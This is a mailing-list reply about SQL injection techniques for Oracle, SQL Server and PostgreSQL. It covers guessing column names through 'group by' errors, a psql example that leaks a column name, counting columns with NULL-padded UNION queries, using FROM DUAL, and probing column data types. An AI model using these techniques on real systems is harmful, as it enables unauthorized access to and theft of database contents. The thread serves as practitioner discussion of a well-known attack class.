Re: about oracle sql injection

[Javier Fernandez-Sanguino <jfernandez () germinus com>]

LAROUCHE Francois wrote:

> Hi,
>
>
> > IMHO, the best you can do is to first use a 'group by' injection
> > to
>
>
> > determine the *name* of the parameters in the select query
>
>
> Well I don't want to be a pain but GROUP BY 0 or by any number
> won't work neither on SQL Server nor Oracle. (unless you know a way
> I don't. If you do please enlighten me :) )

Oops. You are right, you need to first know a column name to start 
with. I don't remember now where I used this first but maybe I did try 
things like 'group by uid' first (blind guessing that 'uid' might be a 
valid column name). It must just be that the programmers have used the 
same name for the parameters used in the HTTP CGI requests than those 
being used as column names in the database.

In some databases (testing PostgreSQL right now) it looks like you can 
use a 'group by' clause with a column from a *different* table and get 
valid information from the original table:

$ psql template1
# select * from pg_catalog.pg_am group by 
information_schema.columns.table_name;
NOTICE:  adding missing FROM-clause entry for table "columns"
ERROR:  column "pg_am.amname" must appear in the GROUP BY clause or be 
used in an aggregate function

Note: 'amname' is the first column of the  pg_catalog.pg_am  table, 
information_schema is the system database and 'columns' is one of it's 
tables.

Don't have access to an Oracle database right now to test this out 
with the system tables and see if it would work out fine. Anyone care 
to test?

> > Maybe NULLs will pass?
>
>
> And yes null will work pretty fine, actually the trick is to try
> null until it won't raise an error stating that there is a
> incorrect number of results. Don't forget to add FROM DUAL in your
> union query. If not you will never get any result back on the web
> page in case you want to use only the some Oracle variable such as
> "user".

IIRC the 'from DUAL' is only required for Oracle. Are NULLs casted too 
to the valid data types in SQL Server too? I can confirm it works for 
PostgreSQL.

> Once you have found the right number of columns, you start to
> remove the first null and replace it with a 1 and see what is the
> error message, if there is one try with '1'. Now it should work.

Notice that there are other datatypes, I've found queries using 
timestamps, dates and binary datatypes, so you might have more than 
two data types to test. Integers and strings (varchars) are the most 
common though.

Regards

Javier